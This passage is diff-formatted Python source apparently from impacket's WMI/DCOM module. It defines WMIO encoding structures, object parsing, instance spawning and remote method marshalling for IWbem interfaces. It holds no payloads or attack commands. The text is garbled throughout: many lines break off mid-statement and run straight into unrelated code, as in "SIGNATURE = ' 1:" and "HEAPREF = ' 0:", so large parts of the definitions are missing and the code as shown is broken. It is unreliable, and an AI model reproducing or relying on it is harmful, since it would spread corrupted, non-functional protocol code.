GUID +from impacket.dcerpc.v5.enum import Enum +from impacket.dcerpc.v5.rpcrt import DCERPCException +from impacket import hresult_errors, LOG +from impacket.uuid import string_to_bin, uuidtup_to_bin +from impacket.structure import Structure, hexdump + + +def format_structure(d, level=0): + x = "" + if isinstance(d, collections.Mapping): + lenk = max([len(str(x)) for x in list(d.keys())]) + for k, v in list(d.items()): + key_text = "\n" + " "*level + " "*(lenk - len(str(k))) + str(k) + x += key_text + ": " + format_structure(v, level=level+lenk) + elif isinstance(d, collections.Iterable) and not isinstance(d, str): + for e in d: + x += "\n" + " "*level + "- " + format_structure(e, level=level+4) + else: + x = str(d) + return x +try: + from collections import OrderedDict +except: + try: + from ordereddict.ordereddict import OrderedDict + except: + from ordereddict import OrderedDict + +class DCERPCSessionError(DCERPCException): + def __init__(self, error_string=None, error_code=None, packet=None): + DCERPCException.__init__(self, error_string, error_code, packet) + + def __str__( self ): + if self.error_code in hresult_errors.ERROR_MESSAGES: + error_msg_short = hresult_errors.ERROR_MESSAGES[self.error_code][0] + error_msg_verbose = hresult_errors.ERROR_MESSAGES[self.error_code][1] + return 'WMI SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose) + else: + # Let's see if we have it as WBEMSTATUS + try: + return 'WMI Session Error: code: 0x%x - %s' % (self.error_code, WBEMSTATUS.enumItems(self.error_code).name) + except: + return 'WMI SessionError: unknown error code: 0x%x' % self.error_code + +################################################################################ +# WMIO Structures and Constants +################################################################################ +WBEM_FLAVOR_FLAG_PROPAGATE_O_INSTANCE = 0x01 +WBEM_FLAVOR_FLAG_PROPAGATE_O_DERIVED_CLASS = 0x02 +WBEM_FLAVOR_NOT_OVERRIDABLE = 0x10 +WBEM_FLAVOR_ORIGIN_PROPAGATED = 0x20 +WBEM_FLAVOR_ORIGIN_SYSTEM = 0x40 +WBEM_FLAVOR_AMENDED = 0x80 + +# 2.2.6 ObjectFlags +OBJECT_FLAGS = 'B=0' + +#2.2.77 Signature +SIGNATURE = ' 1: + if self['Encoded_String_Flag'] == 0: + self.structure += self.tascii + # Let's search for the end of the string + index = data[1:].find(b'\x00') + data = data[:index+1+1] + else: + self.structure = self.tunicode + self.isUnicode = True + + self.fromString(data) + else: + self.structure = self.tascii + self.data = None + + def __getitem__(self, key): + if key == 'Character' and self.isUnicode: + return self.fields['Character'].decode('utf-16le') + return Structure.__getitem__(self, key) + + +# 2.2.8 DecServerName +DEC_SERVER_NAME = ENCODED_STRING + +# 2.2.9 DecNamespaceName +DEC_NAMESPACE_NAME = ENCODED_STRING + +# 2.2.7 Decoration +class DECORATION(Structure): + structure = ( + ('DecServerName', ':', DEC_SERVER_NAME), + ('DecNamespaceName', ':', DEC_NAMESPACE_NAME), + ) + +# 2.2.69 HeapRef +HEAPREF = ' 0: + itemn = QUALIFIER(data) + if itemn['QualifierName'] == 0xffffffff: + qName = b'' + elif itemn['QualifierName'] & 0x80000000: + qName = DICTIONARY_REFERENCE[itemn['QualifierName'] & 0x7fffffff] + else: + qName = ENCODED_STRING(heap[itemn['QualifierName']:])['Character'] + + value = ENCODED_VALUE.getValue(itemn['QualifierType'], itemn['QualifierValue'], heap) + qualifiers[qName] = value + data = data[len(itemn):] + + return qualifiers + +# 2.2.20 ClassQualifierSet +CLASS_QUALIFIER_SET = QUALIFIER_SET + +# 2.2.22 PropertyCount +PROPERTY_COUNT = ' 0: + record = QUALIFIER(qualifiersBuf) + if record['QualifierName'] & 0x80000000: + qualifierName = DICTIONARY_REFERENCE[record['QualifierName'] & 0x7fffffff] + else: + qualifierName = ENCODED_STRING(heap[record['QualifierName']:])['Character'] + qualifierValue = ENCODED_VALUE.getValue(record['QualifierType'], record['QualifierValue'], heap) + qualifiersBuf = qualifiersBuf[len(record):] + qualifiers[qualifierName] = qualifierValue + + propItemDict['qualifiers'] = qualifiers + properties[propName] = propItemDict + + propTable = propTable[self.PropertyLookupSize:] + + return OrderedDict(sorted(list(properties.items()), key=lambda x:x[1]['order'])) + #return properties + +# 2.2.66 Heap +HEAP_LENGTH = ' 0: + value = ENCODED_VALUE.getValue(properties[key]['type'], itemValue, heap) + properties[key]['value'] = "%s" % value + valueTable = valueTable[dataSize:] + return properties + +# 2.2.39 MethodCount +METHOD_COUNT = ' 0: + methodDict['InParams'] = inputSignature['ObjectBlock']['ClassType']['CurrentClass'].getProperties() + methodDict['InParamsRaw'] = inputSignature['ObjectBlock'] + #print methodDict['InParams'] + else: + methodDict['InParams'] = None + if itemn['OutputSignature'] != 0xffffffff: + outputSignature = METHOD_SIGNATURE_BLOCK(heap[itemn['OutputSignature']:]) + if outputSignature['EncodingLength'] > 0: + methodDict['OutParams'] = outputSignature['ObjectBlock']['ClassType']['CurrentClass'].getProperties() + methodDict['OutParamsRaw'] = outputSignature['ObjectBlock'] + else: + methodDict['OutParams'] = None + data = data[len(itemn):] + methods[methodDict['name']] = methodDict + + return methods + +# 2.2.14 ClassAndMethodsPart +class CLASS_AND_METHODS_PART(Structure): + structure = ( + ('ClassPart', ':', CLASS_PART), + ('MethodsPart', ':', METHODS_PART), + ) + + def getClassName(self): + pClassName = self['ClassPart']['ClassHeader']['ClassNameRef'] + cHeap = self['ClassPart']['ClassHeap']['HeapItem'] + if pClassName == 0xffffffff: + return 'None' + else: + className = ENCODED_STRING(cHeap[pClassName:])['Character'] + derivationList = self['ClassPart']['DerivationList']['ClassNameEncoding'] + while len(derivationList) > 0: + superClass = ENCODED_STRING(derivationList)['Character'] + className += ' : %s ' % superClass + derivationList = derivationList[len(ENCODED_STRING(derivationList))+4:] + return className + + def getQualifiers(self): + return self["ClassPart"].getQualifiers() + + def getProperties(self): + #print format_structure(self["ClassPart"].getProperties()) + return self["ClassPart"].getProperties() + + def getMethods(self): + return self["MethodsPart"].getMethods() + +# 2.2.13 CurrentClass +CURRENT_CLASS = CLASS_AND_METHODS_PART + +# 2.2.54 InstanceFlags +INSTANCE_FLAGS = 'B=0' + +# 2.2.55 InstanceClassName +INSTANCE_CLASS_NAME = HEAP_STRING_REF + +# 2.2.27 NullAndDefaultFlag +NULL_AND_DEFAULT_FLAG = 'B=0' + +# 2.2.26 NdTable +NDTABLE = NULL_AND_DEFAULT_FLAG + +# 2.2.56 InstanceData +#InstanceData = ValueTable + +class CURRENT_CLASS_NO_METHODS(CLASS_AND_METHODS_PART): + structure = ( + ('ClassPart', ':', CLASS_PART), + ) + def getMethods(self): + return () + +# 2.2.65 InstancePropQualifierSet +INST_PROP_QUAL_SET_FLAG = 'B=0' +class INSTANCE_PROP_QUALIFIER_SET(Structure): + commonHdr = ( + ('InstPropQualSetFlag', INST_PROP_QUAL_SET_FLAG), + ) + tail = ( + # ToDo: this is wrong.. this should be an array of QualifierSet, see documentation + #('QualifierSet', ':', QualifierSet), + ('QualifierSet', ':', QUALIFIER_SET), + ) + + def __init__(self, data = None, alignment = 0): + Structure.__init__(self, data, alignment) + self.structure = () + if data is not None: + # Let's first check the commonHdr + self.fromString(data) + if self['InstPropQualSetFlag'] == 2: + # We don't support this yet! + raise Exception("self['InstPropQualSetFlag'] == 2") + self.fromString(data) + else: + self.data = None + +# 2.2.57 InstanceQualifierSet +class INSTANCE_QUALIFIER_SET(Structure): + structure = ( + ('QualifierSet', ':', QUALIFIER_SET), + ('InstancePropQualifierSet', ':', INSTANCE_PROP_QUALIFIER_SET), + ) + +# 2.2.58 InstanceHeap +INSTANCE_HEAP = HEAP + +# 2.2.53 InstanceType +class INSTANCE_TYPE(Structure): + commonHdr = ( + ('CurrentClass', ':', CURRENT_CLASS_NO_METHODS), + ('EncodingLength', ENCODING_LENGTH), + ('InstanceFlags', INSTANCE_FLAGS), + ('InstanceClassName', INSTANCE_CLASS_NAME), + ('_NdTable_ValueTable', '_-NdTable_ValueTable', + 'self["CurrentClass"]["ClassPart"]["ClassHeader"]["NdTableValueTableLength"]'), + ('NdTable_ValueTable',':'), + ('InstanceQualifierSet', ':', INSTANCE_QUALIFIER_SET), + ('InstanceHeap', ':', INSTANCE_HEAP), + ) + + def __init__(self, data = None, alignment = 0): + Structure.__init__(self, data, alignment) + self.structure = () + if data is not None: + # Let's first check the commonHdr + self.fromString(data) + #hexdump(data[len(self.getData()):]) + self.NdTableSize = (self['CurrentClass']['ClassPart']['PropertyLookupTable']['PropertyCount'] - 1) //4 + 1 + #self.InstanceDataSize = self['CurrentClass']['ClassPart']['PropertyLookupTable']['PropertyCount'] * len(InstanceData()) + self.fromString(data) + else: + self.data = None + + def getValues(self, properties): + heap = self["InstanceHeap"]["HeapItem"] + valueTableOff = (len(properties) - 1) // 4 + 1 + valueTable = self['NdTable_ValueTable'][valueTableOff:] + sorted_props = sorted(list(properties.keys()), key=lambda k: properties[k]['order']) + for key in sorted_props: + pType = properties[key]['type'] & (~(CIM_ARRAY_FLAG|Inherited)) + if properties[key]['type'] & CIM_ARRAY_FLAG: + unpackStr = HEAPREF[:-2] + else: + unpackStr = CIM_TYPES_REF[pType][:-2] + dataSize = calcsize(unpackStr) + try: + itemValue = unpack(unpackStr, valueTable[:dataSize])[0] + except: + LOG.error("getValues: Error Unpacking!") + itemValue = 0xffffffff + + # if itemValue == 0, default value remains + if itemValue != 0: + value = ENCODED_VALUE.getValue( properties[key]['type'], itemValue, heap) + properties[key]['value'] = value + # is the value set valid or should we clear it? ( if not inherited ) + elif properties[key]['inherited'] == 0: + properties[key]['value'] = None + valueTable = valueTable[dataSize:] + return properties + +# 2.2.12 ParentClass +PARENT_CLASS = CLASS_AND_METHODS_PART + +# 2.2.13 CurrentClass +CURRENT_CLASS = CLASS_AND_METHODS_PART + +class CLASS_TYPE(Structure): + structure = ( + ('ParentClass', ':', PARENT_CLASS), + ('CurrentClass', ':', CURRENT_CLASS), + ) + +# 2.2.5 ObjectBlock +class OBJECT_BLOCK(Structure): + commonHdr = ( + ('ObjectFlags', OBJECT_FLAGS), + ) + + decoration = ( + ('Decoration', ':', DECORATION), + ) + + instanceType = ( + ('InstanceType', ':', INSTANCE_TYPE), + ) + + classType = ( + ('ClassType', ':', CLASS_TYPE), + ) + def __init__(self, data = None, alignment = 0): + Structure.__init__(self, data, alignment) + self.ctParent = None + self.ctCurrent = None + + if data is not None: + self.structure = () + if ord(data[0:1]) & 0x4: + # WMIO - 2.2.6 - 0x04 If this flag is set, the object has a Decoration block. + self.structure += self.decoration + if ord(data[0:1]) & 0x01: + # The object is a CIM class. + self.structure += self.classType + else: + self.structure += self.instanceType + + self.fromString(data) + else: + self.data = None + + def isInstance(self): + if self['ObjectFlags'] & 0x01: + return False + return True + + def printClass(self, pClass, cInstance = None): + qualifiers = pClass.getQualifiers() + + for qualifier in qualifiers: + print("[%s]" % qualifier) + + className = pClass.getClassName() + + print("class %s \n{" % className) + + properties = pClass.getProperties() + if cInstance is not None: + properties = cInstance.getValues(properties) + + for pName in properties: + #if property['inherited'] == 0: + qualifiers = properties[pName]['qualifiers'] + for qName in qualifiers: + if qName != 'CIMTYPE': + print('\t[%s(%s)]' % (qName, qualifiers[qName])) + print("\t%s %s" % (properties[pName]['stype'], properties[pName]['name']), end=' ') + if properties[pName]['value'] is not None: + if properties[pName]['type'] == CIM_TYPE_ENUM.CIM_TYPE_OBJECT.value: + print('= IWbemClassObject\n') + elif properties[pName]['type'] == CIM_TYPE_ENUM.CIM_ARRAY_OBJECT.value: + if properties[pName]['value'] == 0: + print('= %s\n' % properties[pName]['value']) + else: + print('= %s\n' % list('IWbemClassObject' for _ in range(len(properties[pName]['value'])))) + else: + print('= %s\n' % properties[pName]['value']) + else: + print('\n') + + print() + methods = pClass.getMethods() + for methodName in methods: + for qualifier in methods[methodName]['qualifiers']: + print('\t[%s]' % qualifier) + + if methods[methodName]['InParams'] is None and methods[methodName]['OutParams'] is None: + print('\t%s %s();\n' % ('void', methodName)) + if methods[methodName]['InParams'] is None and len(methods[methodName]['OutParams']) == 1: + print('\t%s %s();\n' % (methods[methodName]['OutParams']['ReturnValue']['stype'], methodName)) + else: + returnValue = b'' + if methods[methodName]['OutParams'] is not None: + # Search the Return Value + #returnValue = (item for item in method['OutParams'] if item["name"] == "ReturnValue").next() + if 'ReturnValue' in methods[methodName]['OutParams']: + returnValue = methods[methodName]['OutParams']['ReturnValue']['stype'] + + print('\t%s %s(\n' % (returnValue, methodName), end=' ') + if methods[methodName]['InParams'] is not None: + for pName in methods[methodName]['InParams']: + print('\t\t[in] %s %s,' % (methods[methodName]['InParams'][pName]['stype'], pName)) + + if methods[methodName]['OutParams'] is not None: + for pName in methods[methodName]['OutParams']: + if pName != 'ReturnValue': + print('\t\t[out] %s %s,' % (methods[methodName]['OutParams'][pName]['stype'], pName)) + + print('\t);\n') + + print("}") + + def parseClass(self, pClass, cInstance = None): + classDict = OrderedDict() + classDict['name'] = pClass.getClassName() + classDict['qualifiers'] = pClass.getQualifiers() + classDict['properties'] = pClass.getProperties() + classDict['methods'] = pClass.getMethods() + if cInstance is not None: + classDict['values'] = cInstance.getValues(classDict['properties']) + else: + classDict['values'] = None + + return classDict + + def parseObject(self): + if (self['ObjectFlags'] & 0x01) == 0: + # instance + ctCurrent = self['InstanceType']['CurrentClass'] + currentName = ctCurrent.getClassName() + if currentName is not None: + self.ctCurrent = self.parseClass(ctCurrent, self['InstanceType']) + return + else: + ctParent = self['ClassType']['ParentClass'] + ctCurrent = self['ClassType']['CurrentClass'] + + parentName = ctParent.getClassName() + if parentName is not None: + self.ctParent = self.parseClass(ctParent) + + currentName = ctCurrent.getClassName() + if currentName is not None: + self.ctCurrent = self.parseClass(ctCurrent) + + def printInformation(self): + # First off, do we have a class? + if (self['ObjectFlags'] & 0x01) == 0: + # instance + ctCurrent = self['InstanceType']['CurrentClass'] + currentName = ctCurrent.getClassName() + if currentName is not None: + self.printClass(ctCurrent, self['InstanceType']) + return + else: + ctParent = self['ClassType']['ParentClass'] + ctCurrent = self['ClassType']['CurrentClass'] + + parentName = ctParent.getClassName() + if parentName is not None: + self.printClass(ctParent) + + currentName = ctCurrent.getClassName() + if currentName is not None: + self.printClass(ctCurrent) + +# 2.2.70 MethodSignatureBlock +class METHOD_SIGNATURE_BLOCK(Structure): + commonHdr = ( + ('EncodingLength', ENCODING_LENGTH), + ) + tail = ( + ('_ObjectBlock', '_-ObjectBlock', 'self["EncodingLength"]'), + ('ObjectBlock', ':', OBJECT_BLOCK), + ) + def __init__(self, data = None, alignment = 0): + Structure.__init__(self, data, alignment) + if data is not None: + self.fromString(data) + if self['EncodingLength'] > 0: + self.structure = () + self.structure += self.tail + self.fromString(data) + else: + self.data = None + +# 2.2.1 EncodingUnit +class ENCODING_UNIT(Structure): + structure = ( + ('Signature', SIGNATURE), + ('ObjectEncodingLength', OBJECT_ENCODING_LENGTH), + ('_ObjectBlock', '_-ObjectBlock', 'self["ObjectEncodingLength"]'), + ('ObjectBlock', ':', OBJECT_BLOCK), + ) + +################################################################################ +# CONSTANTS +################################################################################ +# 1.9 Standards Assignments +CLSID_WbemLevel1Login = string_to_bin('8BC3F05E-D86B-11D0-A075-00C04FB68820') +CLSID_WbemBackupRestore = string_to_bin('C49E32C6-BC8B-11D2-85D4-00105A1F8304') +CLSID_WbemClassObject = string_to_bin('4590F812-1D3A-11D0-891F-00AA004B2E24') + +IID_IWbemLevel1Login = uuidtup_to_bin(('F309AD18-D86A-11d0-A075-00C04FB68820', '0.0')) +IID_IWbemLoginClientID = uuidtup_to_bin(('d4781cd6-e5d3-44df-ad94-930efe48a887', '0.0')) +IID_IWbemLoginHelper = uuidtup_to_bin(('541679AB-2E5F-11d3-B34E-00104BCC4B4A', '0.0')) +IID_IWbemServices = uuidtup_to_bin(('9556DC99-828C-11CF-A37E-00AA003240C7', '0.0')) +IID_IWbemBackupRestore = uuidtup_to_bin(('C49E32C7-BC8B-11d2-85D4-00105A1F8304', '0.0')) +IID_IWbemBackupRestoreEx = uuidtup_to_bin(('A359DEC5-E813-4834-8A2A-BA7F1D777D76', '0.0')) +IID_IWbemClassObject = uuidtup_to_bin(('DC12A681-737F-11CF-884D-00AA004B2E24', '0.0')) +IID_IWbemContext = uuidtup_to_bin(('44aca674-e8fc-11d0-a07c-00c04fb68820', '0.0')) +IID_IEnumWbemClassObject = uuidtup_to_bin(('027947e1-d731-11ce-a357-000000000001', '0.0')) +IID_IWbemCallResult = uuidtup_to_bin(('44aca675-e8fc-11d0-a07c-00c04fb68820', '0.0')) +IID_IWbemFetchSmartEnum = uuidtup_to_bin(('1C1C45EE-4395-11d2-B60B-00104B703EFD', '0.0')) +IID_IWbemWCOSmartEnum = uuidtup_to_bin(('423EC01E-2E35-11d2-B604-00104B703EFD', '0.0')) + +error_status_t = ULONG + +# lFlags +WBEM_FLAG_RETURN_WBEM_COMPLETE = 0x00000000 +WBEM_FLAG_UPDATE_ONLY = 0x00000001 +WBEM_FLAG_CREATE_ONLY = 0x00000002 +WBEM_FLAG_RETURN_IMMEDIATELY = 0x00000010 +WBEM_FLAG_UPDATE_SAFE_MODE = 0x00000020 +WBEM_FLAG_FORWARD_ONLY = 0x00000020 +WBEM_FLAG_NO_ERROR_OBJECT = 0x00000040 +WBEM_FLAG_UPDATE_FORCE_MODE = 0x00000040 +WBEM_FLAG_SEND_STATUS = 0x00000080 +WBEM_FLAG_ENSURE_LOCATABLE = 0x00000100 +WBEM_FLAG_DIRECT_READ = 0x00000200 +WBEM_MASK_RESERVED_FLAGS = 0x0001F000 +WBEM_FLAG_USE_AMENDED_QUALIFIERS = 0x00020000 +WBEM_FLAG_STRONG_VALIDATION = 0x00100000 +WBEM_FLAG_BACKUP_RESTORE_FORCE_SHUTDOWN = 0x00000001 + +WBEM_INFINITE = 0xffffffff + +################################################################################ +# STRUCTURES +################################################################################ +class UCHAR_ARRAY_CV(NDRUniConformantVaryingArray): + item = 'c' + +class PUCHAR_ARRAY_CV(NDRPOINTER): + referent = ( + ('Data', UCHAR_ARRAY_CV), + ) + +class PMInterfacePointer_ARRAY_CV(NDRUniConformantVaryingArray): + item = PMInterfacePointer + +REFGUID = PGUID + +class ULONG_ARRAY(NDRUniConformantArray): + item = ULONG + +class PULONG_ARRAY(NDRPOINTER): + referent = ( + ('Data', ULONG_ARRAY), + ) + +# 2.2.5 WBEM_CHANGE_FLAG_TYPE Enumeration +class WBEM_CHANGE_FLAG_TYPE(NDRENUM): + # [v1_enum] type + structure = ( + ('Data', '>= 8 + + # Now let's update the structure + objRef = self.get_objRef() + objRef = OBJREF_CUSTOM(objRef) + encodingUnit = ENCODING_UNIT(objRef['pObjectData']) + + currentClass = encodingUnit['ObjectBlock']['InstanceType']['CurrentClass'] + encodingUnit['ObjectBlock']['InstanceType']['CurrentClass'] = b'' + + encodingUnit['ObjectBlock']['InstanceType']['NdTable_ValueTable'] = packedNdTable + valueTable + encodingUnit['ObjectBlock']['InstanceType']['InstanceHeap']['HeapLength'] = len(instanceHeap) | 0x80000000 + encodingUnit['ObjectBlock']['InstanceType']['InstanceHeap']['HeapItem'] = instanceHeap + + encodingUnit['ObjectBlock']['InstanceType']['EncodingLength'] = len(encodingUnit['ObjectBlock']['InstanceType']) + encodingUnit['ObjectBlock']['InstanceType']['CurrentClass'] = currentClass + + encodingUnit['ObjectEncodingLength'] = len(encodingUnit['ObjectBlock']) + + #encodingUnit.dump() + #ENCODING_UNIT(str(encodingUnit)).dump() + + objRef['pObjectData'] = encodingUnit + + return objRef + + def SpawnInstance(self): + # Doing something similar to: + # https://docs.microsoft.com/windows/desktop/api/wbemcli/nf-wbemcli-iwbemclassobject-spawninstance + # + if self.encodingUnit['ObjectBlock'].isInstance() is False: + # We need to convert some things to transform a class into an instance + encodingUnit = ENCODING_UNIT() + + instanceData = OBJECT_BLOCK() + instanceData.structure += OBJECT_BLOCK.decoration + instanceData.structure += OBJECT_BLOCK.instanceType + instanceData['ObjectFlags'] = 6 + instanceData['Decoration'] = self.encodingUnit['ObjectBlock']['Decoration'].getData() + + instanceType = INSTANCE_TYPE() + instanceType['CurrentClass'] = b'' + + # Let's create the heap for the parameters + instanceHeap = b'' + valueTable = b'' + parametersClass = ENCODED_STRING() + parametersClass['Character'] = self.getClassName() + instanceHeap += parametersClass.getData() + curHeapPtr = len(instanceHeap) + + ndTable = 0 + properties = self.getProperties() + + # Let's initialize the values + for i, propName in enumerate(properties): + propRecord = properties[propName] + + pType = propRecord['type'] & (~(CIM_ARRAY_FLAG|Inherited)) + if propRecord['type'] & CIM_ARRAY_FLAG: + # Not yet ready + #print paramDefinition + #raise + packStr = HEAPREF[:-2] + else: + packStr = CIM_TYPES_REF[pType][:-2] + + if propRecord['type'] & CIM_ARRAY_FLAG: + valueTable += pack(packStr, 0) + elif pType not in (CIM_TYPE_ENUM.CIM_TYPE_STRING.value, CIM_TYPE_ENUM.CIM_TYPE_DATETIME.value, + CIM_TYPE_ENUM.CIM_TYPE_REFERENCE.value, CIM_TYPE_ENUM.CIM_TYPE_OBJECT.value): + valueTable += pack(packStr, 0) + elif pType == CIM_TYPE_ENUM.CIM_TYPE_OBJECT.value: + # For now we just pack None + valueTable += b'\x00'*4 + # The default property value is NULL, and it is + # inherited from a parent class. + ndTable |= 3 << (2*i) + else: + strIn = ENCODED_STRING() + strIn['Character'] = '' + valueTable += pack('>= 8 + + instanceType['NdTable_ValueTable'] = packedNdTable + valueTable + + instanceType['InstanceQualifierSet'] = b'\x04\x00\x00\x00\x01' + + instanceType['InstanceHeap'] = HEAP() + instanceType['InstanceHeap']['HeapItem'] = instanceHeap + instanceType['InstanceHeap']['HeapLength'] = len(instanceHeap) | 0x80000000 + instanceType['EncodingLength'] = len(instanceType) + + instanceType['CurrentClass'] = self.encodingUnit['ObjectBlock']['ClassType']['CurrentClass']['ClassPart'] + instanceData['InstanceType'] = instanceType.getData() + + encodingUnit['ObjectBlock'] = instanceData + encodingUnit['ObjectEncodingLength'] = len(instanceData) + + #ENCODING_UNIT(str(encodingUnit)).dump() + + objRefCustomIn = OBJREF_CUSTOM() + objRefCustomIn['iid'] = self._iid + objRefCustomIn['clsid'] = CLSID_WbemClassObject + objRefCustomIn['cbExtension'] = 0 + objRefCustomIn['ObjectReferenceSize'] = len(encodingUnit) + objRefCustomIn['pObjectData'] = encodingUnit + + # There's gotta be a better way to do this + # I will reimplement this stuff once I know it works + import copy + newObj = copy.deepcopy(self) + newObj.set_objRef(objRefCustomIn.getData()) + newObj.process_interface(objRefCustomIn.getData()) + newObj.encodingUnit = ENCODING_UNIT(encodingUnit.getData()) + newObj.parseObject() + if newObj.encodingUnit['ObjectBlock'].isInstance() is False: + newObj.createMethods(newObj.getClassName(), newObj.getMethods()) + else: + newObj.createProperties(newObj.getProperties()) + + return newObj + else: + return self + + def createProperties(self, properties): + for property in properties: + # Do we have an object property? + if properties[property]['type'] == CIM_TYPE_ENUM.CIM_TYPE_OBJECT.value: + # Yes.. let's create an Object for it too + objRef = OBJREF_CUSTOM() + objRef['iid'] = self._iid + objRef['clsid'] = CLSID_WbemClassObject + objRef['cbExtension'] = 0 + objRef['ObjectReferenceSize'] = len(properties[property]['value'].getData()) + objRef['pObjectData'] = properties[property]['value'] + value = IWbemClassObject( INTERFACE(self.get_cinstance(), objRef.getData(), self.get_ipidRemUnknown(), + oxid=self.get_oxid(), target=self.get_target())) + elif properties[property]['type'] == CIM_TYPE_ENUM.CIM_ARRAY_OBJECT.value: + if isinstance(properties[property]['value'], list): + value = list() + for item in properties[property]['value']: + # Yes.. let's create an Object for it too + objRef = OBJREF_CUSTOM() + objRef['iid'] = self._iid + objRef['clsid'] = CLSID_WbemClassObject + objRef['cbExtension'] = 0 + objRef['ObjectReferenceSize'] = len(item.getData()) + objRef['pObjectData'] = item + wbemClass = IWbemClassObject( + INTERFACE(self.get_cinstance(), objRef.getData(), self.get_ipidRemUnknown(), + oxid=self.get_oxid(), target=self.get_target())) + value.append(wbemClass) + else: + value = properties[property]['value'] + else: + value = properties[property]['value'] + setattr(self, property, value) + + def createMethods(self, classOrInstance, methods): + class FunctionPool: + def __init__(self,function): + self.function = function + def __getitem__(self,item): + return partial(self.function,item) + + @FunctionPool + def innerMethod(staticArgs, *args): + classOrInstance = staticArgs[0] + methodDefinition = staticArgs[1] + if methodDefinition['InParams'] is not None: + if len(args) != len(methodDefinition['InParams']): + LOG.error("Function called with %d parameters instead of %d!" % (len(args), len(methodDefinition['InParams']))) + return None + # In Params + encodingUnit = ENCODING_UNIT() + + inParams = OBJECT_BLOCK() + inParams.structure += OBJECT_BLOCK.instanceType + inParams['ObjectFlags'] = 2 + inParams['Decoration'] = b'' + + instanceType = INSTANCE_TYPE() + instanceType['CurrentClass'] = b'' + instanceType['InstanceQualifierSet'] = b'\x04\x00\x00\x00\x01' + + # Let's create the heap for the parameters + instanceHeap = b'' + valueTable = b'' + parametersClass = ENCODED_STRING() + parametersClass['Character'] = '__PARAMETERS' + instanceHeap += parametersClass.getData() + curHeapPtr = len(instanceHeap) + + ndTable = 0 + for i in range(len(args)): + paramDefinition = list(methodDefinition['InParams'].values())[i] + inArg = args[i] + + pType = paramDefinition['type'] & (~(CIM_ARRAY_FLAG|Inherited)) + if paramDefinition['type'] & CIM_ARRAY_FLAG: + # Not yet ready + #print paramDefinition + #raise + packStr = HEAPREF[:-2] + else: + packStr = CIM_TYPES_REF[pType][:-2] + + if paramDefinition['type'] & CIM_ARRAY_FLAG: + if inArg is None: + valueTable += pack(packStr, 0) + elif pType in (CIM_TYPE_ENUM.CIM_TYPE_STRING.value, CIM_TYPE_ENUM.CIM_TYPE_DATETIME.value, + CIM_TYPE_ENUM.CIM_TYPE_REFERENCE.value, CIM_TYPE_ENUM.CIM_TYPE_OBJECT.value): + arraySize = pack(HEAPREF[:-2], len(inArg)) + arrayItems = [] + for j in range(len(inArg)): + curVal = inArg[j] + if pType == CIM_TYPE_ENUM.CIM_TYPE_OBJECT.value: + curObject = b'' + marshaledObject = curVal.marshalMe() + curObject += pack('>= 8 + + instanceType['NdTable_ValueTable'] = packedNdTable + valueTable + heapRecord = HEAP() + heapRecord['HeapLength'] = len(instanceHeap) | 0x80000000 + heapRecord['HeapItem'] = instanceHeap + + instanceType['InstanceHeap'] = heapRecord + + instanceType['EncodingLength'] = len(instanceType) + inMethods = methodDefinition['InParamsRaw']['ClassType']['CurrentClass']['ClassPart'] + inMethods['ClassHeader']['EncodingLength'] = len( + methodDefinition['InParamsRaw']['ClassType']['CurrentClass']['ClassPart'].getData()) + instanceType['CurrentClass'] = inMethods + + inParams['InstanceType'] = instanceType.getData() + + encodingUnit['ObjectBlock'] = inParams + encodingUnit['ObjectEncodingLength'] = len(inParams) + + objRefCustomIn = OBJREF_CUSTOM() + objRefCustomIn['iid'] = self._iid + objRefCustomIn['clsid'] = CLSID_WbemClassObject + objRefCustomIn['cbExtension'] = 0 + objRefCustomIn['ObjectReferenceSize'] = len(encodingUnit) + objRefCustomIn['pObjectData'] = encodingUnit + else: + objRefCustomIn = NULL + + ### OutParams + encodingUnit = ENCODING_UNIT() + + outParams = OBJECT_BLOCK() + outParams.structure += OBJECT_BLOCK.instanceType + outParams['ObjectFlags'] = 2 + outParams['Decoration'] = b'' + + instanceType = INSTANCE_TYPE() + instanceType['CurrentClass'] = b'' + instanceType['NdTable_ValueTable'] = b'' + instanceType['InstanceQualifierSet'] = b'' + instanceType['InstanceHeap'] = b'' + instanceType['EncodingLength'] = len(instanceType) + instanceType['CurrentClass'] = methodDefinition['OutParamsRaw']['ClassType']['CurrentClass']['ClassPart'].getData() + outParams['InstanceType'] = instanceType.getData() + + + encodingUnit['ObjectBlock'] = outParams + encodingUnit['ObjectEncodingLength'] = len(outParams) + + objRefCustom = OBJREF_CUSTOM() + objRefCustom['iid'] = self._iid + objRefCustom['clsid'] = CLSID_WbemClassObject + objRefCustom['cbExtension'] = 0 + objRefCustom['ObjectReferenceSize'] = len(encodingUnit) + objRefCustom['pObjectData'] = encodingUnit + try: + return self.__iWbemServices.ExecMethod(classOrInstance, methodDefinition['name'], pInParams = objRefCustomIn ) + #return self.__iWbemServices.ExecMethod('Win32_Process.Handle="436"', methodDefinition['name'], + # pInParams=objRefCustomIn).getObject().ctCurrent['properties'] + except Exception as e: + if LOG.level == logging.DEBUG: + import traceback + traceback.print_exc() + LOG.error(str(e)) + + for methodName in methods: + innerMethod.__name__ = methodName + setattr(self,innerMethod.__name__,innerMethod[classOrInstance,methods[methodName]]) + #methods = self.encodingUnit['ObjectBlock'] + + +class IWbemLoginClientID(IRemUnknown): + def __init__(self, interface): + IRemUnknown.__init__(self,interface) + self._iid = IID_IWbemLoginClientID + + def SetClientInfo(self, wszClientMachine, lClientProcId = 1234): + request = IWbemLoginClientID_SetClientInfo() + request['wszClientMachine'] = checkNullString(wszClientMachine) + request['lClientProcId'] = lClientProcId + request['lReserved'] = 0 + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + return resp + +class IWbemLoginHelper(IRemUnknown): + def __init__(self, interface): + IRemUnknown.__init__(self,interface) + self._iid = IID_IWbemLoginHelper + + def SetEvent(self, sEventToSet): + request = IWbemLoginHelper_SetEvent() + request['sEventToSet'] = sEventToSet + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return resp + + +class IWbemWCOSmartEnum(IRemUnknown): + def __init__(self, interface): + IRemUnknown.__init__(self,interface) + self._iid = IID_IWbemWCOSmartEnum + + def Next(self, proxyGUID, lTimeout, uCount): + request = IWbemWCOSmartEnum_Next() + request['proxyGUID'] = proxyGUID + request['lTimeout'] = lTimeout + request['uCount'] = uCount + resp = self.request(request, iid = self._iid, uuid = self.get_iPid()) + resp.dump() + return resp + +class IWbemFetchSmartEnum(IRemUnknown): + def __init__(self, interface): + IRemUnknown.__init__(self,interface) + self._iid = IID_IWbemFetchSmartEnum + + def GetSmartEnum(self, 